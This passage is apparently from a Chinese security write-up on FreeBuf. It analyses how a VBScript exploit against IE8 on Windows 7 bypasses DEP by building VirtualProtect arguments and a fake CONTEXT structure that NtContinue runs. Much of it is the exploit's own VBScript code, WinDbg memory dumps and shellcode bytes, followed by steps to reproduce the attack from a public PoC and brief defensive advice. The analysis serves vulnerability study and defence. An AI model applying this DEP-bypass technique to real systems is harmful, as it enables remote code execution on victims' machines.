41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA //当前地址的权限问题 0: kd> !pte 025e0024 VA 025e0024 PDE at C0600090 PTE at C0012F00 contains 0000000076382867 contains 8000000043F0F867 pfn 76382 ---DA--UWEV pfn 43f0f ---DA--UW-V现在shellcode的已经加载到内存中了,接下来就是构造环境执行的问题了
3.5.2.ShellCode 绕过DEPv
重点是这两个函数:
代码语言:javascript复制SetMemValue VirtualProtectCallParameters(ShellcodeAddr) lIlll=GetMemValue() 69596 '0x10FDC IsEmpty(lIlll) SetMemValue ExpandWithVirtualProtect(lIlll) llIIll=GetMemValue() IsEmpty(llIIll)先看 VirtualProtectCallParameters 函数:
代码语言:javascript复制'构造VirtualProtect环境 参数为shellcode地址 Function VirtualProtectCallParameters(ShellcodeAddrParam) 'bypass cfg Alert "VirtualProtectCallParameters" Dim result result=String((100334-65536),Unescape("䅁")) '重复0x10FDC个“A” result=result &EscapeAddress(ShellcodeAddrParam) '在0FDC个“A”后面放入shellcode地址 result=result &EscapeAddress(ShellcodeAddrParam) '第一个参数 修改的基地址 result=result &EscapeAddress(&h3000) '第二个参数 size result=result &EscapeAddress(&h40) '第三个参数PAGE_EXECUTE_READWRITE 0x40) result=result &EscapeAddress(ShellcodeAddrParam-8) '第四个,内存原始属性保存地址 result=result &String(6,Unescape("䉂")) '重复 6个“**” result=result &StructWithNtContinueAddr() ' x00 * 3 NtContinue * 4 x00 result=result &String((&h80000-LenB(result))/2,Unescape("䅁")) '重复 0x80000- ?个“AA” VirtualProtectCallParameters=result End Function一步一步解析:(VBS里面的&代表的是字符串的连接)
代码语言:javascript复制//源码:result=String((100334-65536),Unescape("䅁")) //重复0x10FDC个“AA” 0:005> dd poi(esp c) lc 0055e470 0000004a 00000000 02129da8 00000000 0055e480 024d0008 024dcc34 0392ca3c 024dcc1c 0055e490 00000000 02108298 0037a1bc 0055f5cc 0:005> dd 02129da8 lc 02129da8 00000008 00000000 0393da34 00000000 02129db8 00000000 00000000 655fbbf0 0c04fced 02129dc8 00000000 00550050 00000000 0055f698 //申请出的字符串 0:005> db 0393da34 0393da34 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0393da44 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0393da54 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0393da64 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0393da74 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0393da84 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0393da94 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0393daa4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA //源码:result=result &EscapeAddress(ShellcodeAddrParam) 将shellcode地址放到字符串后面 0:005> dd 0393da34 10FDC lc 0394ea10 0265002c 00000000 00000000 00000000 //0265002c是shellcode的地址 0394ea20 f117622e 0007b655 003bb6d0 0035db68 0394ea30 00000000 00000000 00000000 00000000 //shellcode地址由于重新调试与上面地址不一样,但是可以看到确实是shellcode的代码 0:005> db 0265002c 0265002c fc e8 82 00 00 00 60 89-e5 31 c0 64 8b 50 30 8b ......`..1.d.P0. 0265003c 52 0c 8b 52 14 8b 72 28-0f b7 4a 26 31 ff ac 3c R..R..r(..J&1..< 0265004c 61 7c 02 2c 20 c1 cf 0d-01 c7 e2 f2 52 57 8b 52 a|., .......RW.R 0265005c 10 8b 4a 3c 8b 4c 11 78-e3 48 01 d1 51 8b 59 20 ..J<.L.x.H..Q.Y 0265006c 01 d3 8b 49 18 e3 3a 49-8b 34 8b 01 d6 31 ff ac ...I..:I.4...1.. 0265007c c1 cf 0d 01 c7 38 e0 75-f6 03 7d f8 3b 7d 24 75 .....8.u..}.;}$u 0265008c e4 58 8b 58 24 01 d3 66-8b 0c 4b 8b 58 1c 01 d3 .X.X$..f..K.X... 0265009c 8b 04 8b 01 d0 89 44 24-24 5b 5b 61 59 5a 51 ff ......D$$[[aYZQ. //接下来开始为 VirtualProtect 构造参数: //result=result &EscapeAddress(ShellcodeAddrParam) 0:005> dd poi(esp c) lc 0055e470 0212004a 024dcc24 02129da8 0055cab0 0055e480 02110008 00000004 0392ca3c 6e5d0001 0055e490 00000000 02108298 0037a1bc 0055f5cc 0055e4a0 024dd0b0 0055e4d0 02650008 024dc9d4 0:005> dd 02129da8 lc 02129da8 02120008 024dcc24 0393da34 0055cab0 02129db8 00000000 00000000 655fbbf0 0c04fced 02129dc8 00000000 00550050 00000000 0055f698 0:005> dd 0393da34 lc //1--lpAddress:修改的基地址(也是上面字符串的起始地址)0393da34 41414141 41414141 41414141 41414141 0393da44 41414141 41414141 41414141 41414141 0393da54 41414141 41414141 41414141 41414141 //result=result &EscapeAddress(&h3000) '2--dwSize: size //result=result &EscapeAddress(&h40) '3--flNewProtect:PAGE_EXECUTE_READWRITE //result=result &EscapeAddress(ShellcodeAddrParam-8) '4--pflOldProtect: 内存原始属性保存地址 //result的值在不停的变化 0:005> dd 0392ca3c 10fdc 0393da18 0265002c 0265002c 00003000 00000040 0393da28 02650024 08060000 00010fe8 41414141 //result=result &String(6,Unescape("䉂")) '重复 12个“*” 0:005> dd 0394ea5c 10fdc 0395fa38 0265002c 0265002c 00003000 00000040 0395fa48 02650024 42424242 42424242 42424242 //result=result &StructWithNtContinueAddr() ' 3*0x00 4*NtContinue函数地址 0x00 //StructWithNtContinueAddr 函数是将x00 与NtContinue 函数地址形成了一个拼接, 0:005> dd 0392ca3c 10fdc 0393da18 0265002c 0265002c 00003000 00000040 0393da28 02650024 42424242 42424242 42424242 0393da38 68000000 68776a55 68776a55 68776a55 //NtContinue的函数地址是 776a5568,68位置不太对看起来有点怪异 0393da48 00776a55 41410000 41414141 41414141 0393da58 97174369 0006b5af 002d00c4 003bb6d0 0393da68 41414141 41414141 41414141 41414141 0393da78 41414141 41414141 41414141 41414141 0393da88 41414141 41414141 41414141 41414141 //result=result &String((&h80000-LenB(result))/2,Unescape("䅁")) //把除了当前的result有效的位置外的地方全部写成"A" //最终的效果是: 0:005> dd 02b70024 10fdc 02b81000 0265002c 0265002c 00003000 00000040 //依次为 shellcode 地址,VirtualProtect四个参数 02b81010 02650024 42424242 42424242 42424242 02b81020 68000000 68776a55 68776a55 68776a55 //NtContinue 的函数地址 02b81030 00776a55 41414141 41414141 41414141 02b81040 41414141 41414141 41414141 41414141 02b81050 41414141 41414141 41414141 41414141 02b81060 41414141 41414141 41414141 41414141 02b81070 41414141 41414141 41414141 41414141继续往下走:SetMemValue VirtualProtectCallParameters(ShellcodeAddr)
代码语言:javascript复制//SetMemValue函数内的IsEmpty断点: 0:005> dd 0037a1bc 0037a1bc 00000002 00000000 02110008 02105c94 0037a1cc 01dc0024 40000000 0037a1e4 7cd33254 //01dc0024是VirtualProtectCallParameters函数返回的地址 0037a1dc 88006c6c 00000000 00000000 00000000 0037a1ec 00000000 00000000 00000000 00000000 0037a1fc 00000000 7cd3322f 8000e984 77110106 0037a20c 00000000 771246e2 00000017 0037a208 0037a21c 00000000 00000000 00000000 7cd3322a 0037a22c 88005668 00000000 00000000 00350000 //lIlll=GetMemValue() 0x10FDC 0:005> dd 0037a1bc 0037a1bc 02120002 02129db8 02b70003 6e5d1684 //更改类型为Long 0037a1cc 01dc0024 40000000 0037a1e4 7cd33254 //返回01dc0024地址 0037a1dc 88006c6c 00000000 003b2f48 77737560 0037a1ec 00379f90 00000000 00000000 00000000 //lIlll 得到这片特殊环境的首地址 01dd1000 0:005> dd 01dc0024 10fdc 01dd1000 0265002c 0265002c 00003000 00000040 01dd1010 02650024 42424242 42424242 42424242 01dd1020 68000000 68776a55 68776a55 68776a55 01dd1030 00776a55 41414141 41414141 41414141执行 SetMemValue ExpandWithVirtualProtect(lIlll):
先看 ExpandWithVirtualProtect(lIlll) 函数
代码语言:javascript复制//ntContinuePtr=structForVirtualProtect &h23 加的23刚好是 NtContinue 地址,这个值终于正常了 0:005> dd 01dd1000 23 l8 01dd1023 776a5568 776a5568 776a5568 776a5568 01dd1033 41414100 41414141 41414141 41414141 //result=result &String((&hb8-LenB(result))/2,Unescape("A41")) 0:005> dd poi(esp c) lc 0055e460 0000004a 00000000 02129da8 00000000 0055e470 02b70003 6e5d1684 01dd1023 40000000 0055e480 024d0008 024dc9f0 00307044 40000000 0:005> dd 02129da8 lc 02129da8 00000008 00000000 003a502c 00000000 02129db8 00000000 00000000 655fbbf0 0c04fced 02129dc8 00000000 00550050 00000000 0055f698 0:005> dd 003a502c 003a502c 01dd1023 00410041 00410041 00410041 //0041填充 003a503c 00410041 00410041 00410041 00410041 003a504c 00410041 00410041 00410041 00410041 003a505c 00410041 00410041 00410041 00410041 003a506c 00410041 00410041 00410041 00410041 003a507c 00410041 00410041 00410041 00410041 003a508c 00410041 00410041 00410041 00410041 003a509c 00410041 00410041 00410041 00410041 //result=result &EscapeAddress(VirtualProtectAddr) 0:005> dd poi(esp c) 0055e460 024d004a 6e5d196a 02129da8 024dcdf4 0055e470 02b70003 6e5d1684 01dd1023 40000000 0055e480 02110008 00000004 003a502c 6e5d0001 0055e490 00000000 02108298 0037a1bc 0055f5cc 0055e4a0 024dd0b0 0055e4d0 00010fdc 40000000 0055e4b0 02b7400c 6e5d1684 00552650 40000000 0055e4c0 024d0000 0055e5d0 00000000 00000000 0055e4d0 024dd2f4 0055e5d0 02129da8 02107c7c 0:005> dd 02129da8 lc 02129da8 024d0008 6e5d196a 00307044 024dcdf4 02129db8 00000000 00000000 655fbbf0 0c04fced 02129dc8 00000000 00550050 00000000 0055f698 0:005> dd 00307044 l8 00307044 01dd1023 00410041 00410041 00410041 00307054 00410041 00410041 00410041 00410041 0:005> dd 00307044 90 lc 003070d4 00410041 00410041 00410041 00410041 003070e4 00410041 00410041 00410041 00410041 003070f4 00410041 00410041 758e22bd d5ff0000 //加入 VirtualProtect 地址(758e22bd) //下面几步分别在字符串后面拼接了 0xb1、0x00、构造好的构造VirtualProtect环境、0x23 //result=result &EscapeAddress(&h1b) //result=result &EscapeAddress(0) //result=result &EscapeAddress(structForVirtualProtect) //result=result &EscapeAddress(&h23) //我们直接看拼接后的结果;其实这是一个CONTEXT的结构体: 0:005> dd 0036e84c l100 0036e84c 01dd1023 00410041 00410041 00410041 //01dd1023 中保存的是连续4个 NtContinue 函数地址 0036e85c 00410041 00410041 00410041 00410041 0036e86c 00410041 00410041 00410041 00410041 //中间0x0041填充 0036e87c 00410041 00410041 00410041 00410041 0036e88c 00410041 00410041 00410041 00410041 0036e89c 00410041 00410041 00410041 00410041 0036e8ac 00410041 00410041 00410041 00410041 0036e8bc 00410041 00410041 00410041 00410041 0036e8cc 00410041 00410041 00410041 00410041 0036e8dc 00410041 00410041 00410041 00410041 0036e8ec 00410041 00410041 00410041 00410041 0036e8fc 00410041 00410041 758e22bd 0000001b //后面是 VirtualProtect 地址 758e22bd 0036e90c 00000000 01dd1000 00000023 43434343 //01dd1000 构造好的构造VirtualProtect环境 0036e91c 43434343 43434343 43434343 43434343 0036e92c 43434343 43434343 43434343 43434343 0036e93c 43434343 43434343 43434343 43434343SetMemValue ExpandWithVirtualProtect(lIlll) 然后进入SetMemValue把这片空间放到spec_int_1 8 的位置:
代码语言:javascript复制0:005> dd 0037a1bc lc 0037a1bc 02120002 02129db8 02110008 00000004 0037a1cc 0391442c 6e5d0001 0037a1e4 7cd33254 //0391442c 内是上面构造好的内存0037a1dc 88006c6c 00000000 003b2f48 77737560 0:005> dd 0391442c 0391442c 01dd1023 00410041 00410041 00410041 0391443c 00410041 00410041 00410041 00410041 .. .. 039144dc 00410041 00410041 758e22bd 0000001b 039144ec 00000000 01dd1000 00000023 43434343 039144fc 43434343 43434343 43434343 43434343llIIll=GetMemValue()进入 GetMemValue 更换类型为 Long:
代码语言:javascript复制0:005> dd 0037a1bc lc 0037a1bc 02120002 02129db8 00360003 6e5d1684 //更改类型为Long0037a1cc 0391442c 6e5d0001 0037a1e4 7cd33254 0037a1dc 88006c6c 00000000 00000000 00000000PoC中:最终的 ExecuteShellcode 函数
代码语言:javascript复制cla4_obj1.mem(spec_int_1)=&h4d cla4_obj1.mem(spec_int_1 8)=0 //PoC的运行就在于0x4d、0这两个值: 0:005> dd 0037a1bc lc 0037a1bc 00000002 02108298 0037004d 0055f5cc //先把 0x0037004d 修改为了 4d 0037a1cc 0391442c 6e5d0001 0037a1e4 7cd33254 //再把0391442c-->0,在这里看不到,因为修改后直接调用 vbscript!VAR::Clear 函数了 0037a1dc 88006c6c 00000000 003b2f48 77737560我们看一下 vbscript!VAR::Clear 的一些逻辑;
代码语言:javascript复制//(到这里winbdg重启了一次,地址有所变化) .text:6E4F17F0 mov edi, edi .text:6E4F17F2 push esi .text:6E4F17F3 mov esi, ecx //进来 Clear 函数 ecx保存的就是类型地址,那么我们构造的地址就在[ecx 8]的地方 .text:6E4F17F5 movzx ecx, word ptr [esi] // ds:0023:002dbf0c=004d .text:6E4F17F8 movzx eax, cx .text:6E4F17FB push edi .text:6E4F17FC xor edi, edi .text:6E4F17FE sub eax, 49h //减去0x49h .text:6E4F1801 jz loc_6E508B62 .text:6E4F1807 sub eax, 3 //减去0x03 .text:6E4F180A jz loc_6E4F4A63 .text:6E4F1810 dec eax //自减 0x01 .text:6E4F1811 jz loc_6E50089C //所以 esi==0x4d 的话这里要跳转 .text:6E4F1817 dec eax ... 跳转后 .text:6E50089C mov eax, [esi 8] ds:0023:002dbf14=0310a914 //0310a914 是刻意构造的那片内存 .text:6E50089F test eax, eax .text:6E5008A1 jz loc_6E4F1843 .text:6E5008A7 mov ecx, [eax] ds:0023:0310a914=01fb1023 //01fb1023 中保存的是连续4个 NtContinue 函数地址 .text:6E5008A9 push eax .text:6E5008AA call dword ptr [ecx 8] //[ecx 8]当然也是 NtContinue 函数地址 .text:6E5008AD jmp loc_6E4F1843 //所以它构造的0x4d这个值,原因是其余的跳转无法构造好寄存器的值看下 CONTEXT 的结构与我们那片内存对照一下:
代码语言:javascript复制0:005> dt !CONTEXT uxtheme!CONTEXT 0x000 ContextFlags : Uint4B 0x004 Dr0 : Uint4B 0x008 Dr1 : Uint4B 0x00c Dr2 : Uint4B 0x010 Dr3 : Uint4B 0x014 Dr6 : Uint4B 0x018 Dr7 : Uint4B 0x01c FloatSave : _FLOATING_SAVE_AREA 0x08c SegGs : Uint4B 0x090 SegFs : Uint4B 0x094 SegEs : Uint4B 0x098 SegDs : Uint4B 0x09c Edi : Uint4B 0x0a0 Esi : Uint4B 0x0a4 Ebx : Uint4B 0x0a8 Edx : Uint4B 0x0ac Ecx : Uint4B 0x0b0 Eax : Uint4B 0x0b4 Ebp : Uint4B 0x0b8 Eip : Uint4B 0x0bc SegCs : Uint4B 0x0c0 EFlags : Uint4B 0x0c4 Esp : Uint4B 0x0c8 SegSs : Uint4B 0x0cc ExtendedRegisters : [512] UChar 0:005> dd 0036e84c l100 0036e84c 01dd1023 00410041 00410041 00410041 //01dd1023 0x000 ContextFlags 0036e85c 00410041 00410041 00410041 00410041 0036e86c 00410041 00410041 00410041 00410041 0036e87c 00410041 00410041 00410041 00410041 0036e88c 00410041 00410041 00410041 00410041 0036e89c 00410041 00410041 00410041 00410041 0036e8ac 00410041 00410041 00410041 00410041 0036e8bc 00410041 00410041 00410041 00410041 0036e8cc 00410041 00410041 00410041 00410041 0036e8dc 00410041 00410041 00410041 00410041 0036e8ec 00410041 00410041 00410041 00410041 0036e8fc 00410041 00410041 758e22bd 0000001b // 0x0b8 Eip :VirtualProtect 758e22bd 0036e90c 00000000 01dd1000 00000023 43434343 // 0x0c4 Esp : 构造好的VirtualProtect 参数 0036e91c 43434343 43434343 43434343 43434343 0036e92c 43434343 43434343 43434343 43434343 0036e93c 43434343 43434343 43434343 43434343小结:
所以是从VAR::Clear 中调用了 ntdll!ntContinue,而且又仿造好了一个了 CONTEXT结构体,这样利用 ntdll!ntContinue还原了一个假的进程。
且 eip 就是 VirtualProtect,而栈空间esp是前面准备好的,返回值为shellcode入口,VirtualProtect的执行参数也是shellcode区域,最后VirtualProtect函数执行完,直接返回到shellcode的开始处开始执行。
四、复现过程
复现环境:Win7 x86sp1,IE8.0.7601.17514
使用Github的PoC,在上述背景内的环境下直接IE打开即可复现:
五、防护建议
如果要预防此类型漏洞,提供以下建议:
1,微软也已经放弃了vbscript,edr 或其他安全厂商可以考虑禁用vbscript脚本,以避免其造成的安全隐患 2,VirtualProtect 函数,检查参数。
*本文原创作者:Lostpoet,本文属于FreeBuf原创奖励计划,未经许可禁止转载
